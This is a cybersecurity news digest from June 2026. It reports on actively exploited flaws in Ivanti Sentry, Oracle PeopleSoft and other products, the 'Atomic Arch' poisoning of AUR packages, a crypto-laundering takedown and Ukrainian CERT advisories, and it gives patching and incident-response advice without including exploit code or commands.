The Lyceum: Cyber Intelligence Daily — Jun 13, 2026

This was a fast week, and the speed is the story. A CVSS 10.0 Ivanti Sentry flaw went from public proof-of-concept to backdoored gateways in about 40 hours — and CISA's first-ever three-day federal patch deadline expires tomorrow, Sunday June 14. ShinyHunters had already been living inside more than 100 universities' Oracle PeopleSoft systems for two weeks before Oracle even knew the bug existed. And somewhere between 400 and 1,500 Arch Linux packages were quietly poisoned with a rootkit that hides from your own process monitors. The connective tissue: attackers are no longer racing patches — they're beating them, and they're doing it inside the infrastructure nobody watches closely.

• CVE-2026-10520 — Ivanti Sentry (10.5.x, 10.6.x, 10.7.x): actively exploited, patched June 9. KEV maturity 2 (operational). Unauthenticated OS command injection giving root via a single POST request; federal deadline June 14.
• CVE-2026-35273 — Oracle PeopleSoft Enterprise PeopleTools 8.61/8.62: actively exploited as a zero-day, no patch yet (mitigations only). KEV maturity 3 (commoditized), ransomware-linked. Unauthenticated RCE over the internet.
• CVE-2026-20245 — Cisco Catalyst SD-WAN Manager: actively exploited, KEV maturity 2 (operational). Crafted file upload escalates low privileges to root; deadline June 23.
• CVE-2026-11645 — Google Chromium V8: actively exploited, patched. KEV maturity 2. Out-of-bounds read/write enabling sandbox escape; deadline June 23.
• CVE-2026-42271 — BerriAI LiteLLM: actively exploited, KEV maturity 2. Command injection any authenticated user can trigger; deadline June 22.
• Atomic Arch rootkit: AUR supply-chain campaign hijacking orphaned packages to drop a credential stealer and eBPF rootkit. Actively spreading since June 11, with a second wave on June 12.

If your organization runs Ivanti Sentry, assume you are already compromised.

CVE-2026-10520 lets an unauthenticated remote attacker run operating-system commands as root with a single crafted POST request. No login. No user interaction. Ivanti shipped patches on June 9 (Sentry R10.5.2, R10.6.2, R10.7.1), and CISA added the flaw to its Known Exploited Vulnerabilities catalog on June 11, requiring federal agencies to patch by June 14 under the newly issued Binding Operational Directive 26-04 — the agency's first-ever three-day mandate (Windows News). Attackers backdoored gateways within roughly 40 hours of a public proof-of-concept, and Shadowserver's guidance is blunt: any unpatched instance is likely already compromised (TechTimes). Security Affairs confirmed exploitation began shortly after the patch dropped (Security Affairs).

BOD 26-04 swaps flat CVSS deadlines for a risk-based model, and Ivanti Sentry is its first live test.
What failure looks like is familiar — CISA has now flagged 35 Ivanti vulnerabilities as actively exploited since 2020, twelve of them in ransomware campaigns (TechTimes). The signal to watch: whether the three-day clock produces faster real-world patching than the old system, or just faster paperwork.

The breach isn't the scary part. The timeline is. ShinyHunters was inside university systems for two weeks before Oracle knew the vulnerability existed.

Mandiant and the Google Threat Intelligence Group attributed an active compromise-and-extortion campaign to UNC6240 — the cluster better known as ShinyHunters — targeting Oracle PeopleSoft. Activity ran from May 27 to June 9, predating Oracle's June 10 advisory, which makes CVE-2026-35273 (CVSS 9.8, unauthenticated RCE over the internet) a zero-day at the time of exploitation (Google Cloud). Google notified more than 100 organizations with exposed internet-facing systems; 68% were in higher education (CSO Online). The University of Nottingham confirmed a cyber incident on June 11, with The Record reporting ShinyHunters' claim of roughly 455,000 unique email addresses plus names, passport numbers, disability data, and fee records (The Record).

PeopleSoft is the boiler room of an institution — payroll, HR, student records, billing. A reliable path in means the blast radius is exactly the regulated data that triggers lawsuits. Oracle still hasn't shipped a patch and is urging customers to apply mitigations and lock down internet-facing PeopleSoft endpoints now (Technology.org). Watch whether the victim list spreads past higher ed — the group has signaled its extortion outreach is only beginning.

This attack didn't trick anyone into installing something shady. It inherited trust built over years.

Researchers dubbed it "Atomic Arch." Starting around June 11, attackers systematically adopted orphaned AUR packages — legitimate projects abandoned by their maintainers — through the Arch User Repository's standard ownership process, then modified the build scripts. Sonatype found the poisoned PKGBUILDs pulling a malicious npm dependency at install time, carrying a Linux payload for credential harvesting, anti-debugging, and exfiltration (Sonatype). The malware disguises its processes as legitimate kernel threads to dodge ps and htop, and deploys an eBPF rootkit if it runs as root (The Hacker News). BleepingComputer initially counted more than 400 packages; later reporting put the total near 1,500 (BleepingComputer). LWN noted the same orphaned-package trust gap that long-lived community repos keep stumbling into (LWN).

If you installed or updated any AUR package on or after June 11, treat the system as suspect. If the package ran as root, reinstall from trusted media — there's no way to trust a machine with an eBPF rootkit on it. A second wave on June 12 added Bun-based install paths, so the count is still climbing. The signal to watch: whether AUR overhauls its orphaned-package adoption policy, or whether the next attacker simply repeats the playbook.

Every ransomware story has an unglamorous third act: the money has to get clean. Europol, the FBI, and partners say they dismantled AudiA6, a cryptocurrency laundering service that allegedly moved more than $380 million across 11 countries and was linked to over 15 ransomware investigations (BleepingComputer). Investigators described an industrial-scale operation running on thousands of fraudulent exchange accounts opened with stolen identities, acting as a central laundering hub from 2022 to 2025. An earlier arrest in Poland of a Ukrainian national linked to the service helped crack it open.

You don't have to arrest every burglar if you can close the pawn shop. Infrastructure takedowns are one of the few moves that slow many criminal groups at once. The honest question is whether this bends the curve or just reroutes it — ransomware affiliates have a long history of migrating to the next mixer within weeks. The signal to watch: wallet seizures, indictments, or named affiliate fallout would mean law enforcement hit the financial plumbing, not just the branding.

Ukraine's national CERT published an advisory detailing the cluster it tracks as UAC-0247 (also UAC-0244) running a coordinated campaign against Ukrainian hospitals, local government bodies, and operators of FPV drones — the small first-person-view aircraft now central to the front lines. The choice of targets is the tell: it pairs civilian healthcare and municipal systems with the specific military-adjacent drone-operator community, suggesting an intelligence-collection effort aimed at both wartime logistics and battlefield capability. For Western defenders, the pattern matters because UAC clusters that begin in Ukraine have repeatedly pivoted into NATO supply chains within weeks. Source: CERT-UA Advisory #6288271 — Ukrainian. No English-language coverage confirmed at time of publication.

In a campaign tracked as CERT-UA#21075, the cluster UAC-0255 sent phishing messages spoofed to appear as official notifications from CERT-UA, directing recipients to password-protected ZIP archives that deploy a tool the agency calls AGEWHEEZE. Using a country's own cyber-defense agency as the lure to compromise that country's officials is a particularly cynical move — and an effective one, because it weaponizes the exact channel users are trained to trust. If this technique surfaces outside Ukraine, every national CERT becomes a brand worth spoofing, and security-awareness programs quietly need a new module on verifying official guidance. Source: CERT-UA Advisory #6288047 — Ukrainian. No English-language coverage confirmed at time of publication.

A boiler room emptied while the building owner slept; a Linux rootkit cosplaying as a kernel thread so your own htop waves it through; and a $380 million money-laundromat named, for reasons known only to its operators, after a midsize German sedan. The funniest part is that Google is now suing a Chinese smishing crew for using Gemini to write phishing kits — which means the year's defining cyber genre may be vendors getting robbed with their own products. Patch the Ivanti box before Sunday; the clock isn't theoretical.

Forward this to the one friend who still runs an AUR package as root and tell them it's important — because it is.